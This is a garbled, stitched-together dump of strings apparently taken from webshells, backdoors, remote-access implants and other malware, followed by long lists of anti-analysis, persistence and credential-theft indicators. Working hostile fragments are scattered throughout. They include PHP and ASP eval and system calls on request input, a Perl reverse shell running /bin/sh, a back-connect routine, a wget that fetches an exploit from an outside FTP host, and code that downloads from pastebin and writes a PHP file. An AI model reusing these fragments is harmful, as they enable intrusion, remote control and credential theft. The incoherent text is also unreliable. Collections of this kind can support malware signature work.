's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.7.6)mozilla/5.0 (windows; u; windows nt 5.1; zh-cn; rv:1.7.6)?sessd=&sessc=&sessk=3a08fe7b8c4da6ed09f21c3ef97efce2_zn11cthreadpool10getbatcheserst6vectorist4pairissiesais2_ee_znss4_rep10_m_destroyerksaice@@glibcxx_3.4_znst6vectorimsaimee13_m_insert_auxen9__gnu_cxx17__normal_iteratoripms1_eerkm_znst6vectorist4pairissiesais1_ee13_m_insert_auxen9__gnu_cxx17__normal_iteratorips1_s3_eerks1__zst20__throw_out_of_rangepkc@@glibcxx_3.4pages.touchpadz.combat.touchpadz.comstat.touchpadz.comsk2.touchpadz.comtreasurehunter.pdbjucheckcmdlinedecryptedbarcodmsports.dllnddeapi.dllglmf32.dll<requestedexecutionlevel level=\"requireadministrator\" uiaccess=\"false\">cmutil.dllmprapi.dllskype.datskype.inicreatewindowyiwefhiwqcreatedesktopmydesktop
1 :send to server failed.handshake with the server failed. error:decryption failed. context expired.mozilla/4.0 (compatible; msie8.0; windows nt 5.1)!(*@)(!@port!(*@)(!@urlmytmpfile.datsvchost.dll.logmozilla/4.0 (compatible; windows nt 5.1; msie 7.0; trident/4.0)%s\\%c%c%c%c%c%c%cwait:dcryption error! invalid charactersvcmsn.dllconfig service %s ok.install an service hosted by svchost.the dll file that to be released.man,it's meoh,shithallelujahnret == socket_errorrouji\\release\\install.pdbrouji\\svcmain.pdbminiaspwakeup=download ok!command is null!device_input.asp?device_t=mozilla/4.0 (compatible; windows nt 5.1; msie 7.0)name=%s&userid=%04d&other=%c%snoclientuser-agent: mozilla/4.0 (compatible; msie 5.00; windows 98) ksmmupfileokupfileerfxftest*(sy)# cmdsend = %d@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>sleep:down:*========== bye bye ! ==========*letusgohtppmmv2.0.0.1mozilla/4.0 (compatible; )filestocfilectosreshellpostvaluepostdatapostfileclientkeystart cmd failure!downloadcopy:download:geturl:1.234.1.68content=reqpath=savepath=w!r@o#n$gkernel32.dlleclipse_a\\pjts\\eclipse_client_b.pdbxiaomesuncloud-code/uc_server/data/forum.aspserverfile is smaller than clientfile\\m tools\\moondll
1 eb3gzfqobty3sifnoldocbwuwsc2grmv9hn7tfnvnkcrwuufdaeem9dkqralod6qvsozhqpcmc2a8hxdsfunzcmuniqwroijrjwoeagilnnscxadker1h2mznwsnajminiasp.pdbslyhkaay!@#%$^#@!64.91.80.6ejlcmbvbhxjuisvyqzgrhuqusofrpljpltmivvdcbbfrfogjviirrximhttoskop!qaz@wsx<meta xcd=%s?%.6uszfileurl=%sstatus=%udown file successmozilla/4.0 (compatible; msie 6.0; win32)%s\\attachment.datmyoutlookmail.txtrecv time:subject:bits.exepdfbrowbrowser.exeprotect!pls give the full pathmapi32.dlldocompressgetmail.dllname=\"galx\"user-agent: shockwave flashadd cookie failed...,speed=%fy29ubmvjdac2xlzxacxvpday21kdw5zdxbwb3j0iphone8.5(host:%s,ip:%s)software\\microsoft\\windows\\currentversion\\rundefwatch.exeindex1.html!@#tiuq#@!!@#dmc#@!!@#troppusnu#@!inprocserver32hkey_performance_data<!---[<if ie 5>]id=iniet.exesystem\\currentcontrolset\\services\\devfsdevice file system2010qbpadobe_sl.exednsapi.dllready!connect okwinhttp 1.0reader_sl.exems80547.batadr32controlservice failed!3dc76854-c328-43d7-9e07-24bf894f8ef5hkey_current_user\\software\\microsoft\\windows\\currentversion\\runhello from mfc!/default.aspx?index=/default.aspx?id=accept: text*/*xcmd.exegoogle.exebuild error!success!wild scancode too cleverinsufficient lookaheadmozilla/4.0 (compatible; msie 6.1; windows nt 5.1; sv1)mozilla/5.0 (windows; windows nt 5.1; en-us; rv:1.8.0.12) firefox/1.5.0.12vmprotecthttp://[c2_location]/[page].html<!---header adspace style=ersvc.dllntshrui.dll<!--dochtmlausovexception...opened...isun32.exe\\pipe\\ssnptoobu.iniserverfile is not bigger than clientfileurl download success\\xiaome\\suncloud-code\\moonurl download success!kugoosoftmodify file failed!! so strange!create cmd process failed!the command has not been implemented!runas success!onec.php/bin/onecrusinfo.exeadobeupdater.exebuildout.exeimscmig.exelocalfile.exemdm.exemimikatz.exemsdev.exentoskrnl.exeotepad.exereg.exeregsvr.exeruninfo.exeadobeupdate.exeinetinfo.exesvehost.exeupdate.exentlmhash.exewpnpinst.exewsdbg.exeadobeup.exe0830.bin1001.bina.binacrord32.exeinetinfo.exewinrar.sfxsteup=aspnet_client/report.aspname=%s&gender=%c&random=%04d&sessionkey=%snwwwks.dllrdisk.dllskeys.dllinstallserviceuninstallservicedown file ok!send file ok!command error!pls choose target first!alert!pls press enter to make sure!are you sure to analysis and outlook.docnorth korean launch.pdfdollar general.docdow corning corp.pdfsde^`tutlo`m^md`wdr^emml`ho/emmredleavesscmdsimulatormutexred_autumnal_leaves_dllmain.dll\\namepipe_morewindows
1 $ip_padding_dataport_numbpython27.dllemail.header(l
1 ati.jo840112-cras8468-11150923-pci8273vprincpespr!ncpeshastati\\temp\\~v3.logbrowser password recovery reportbrowserpassworddecryptorwww.securityxploded.comc:\\users\\bernardino\\appdata\\roaming\\berna@consultoreslegales.com.mx (1).pstmail password recovery reportmailpassworddecryptorc:\\users\\apant\\documents\\programdata\\abacus.ostc
1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows 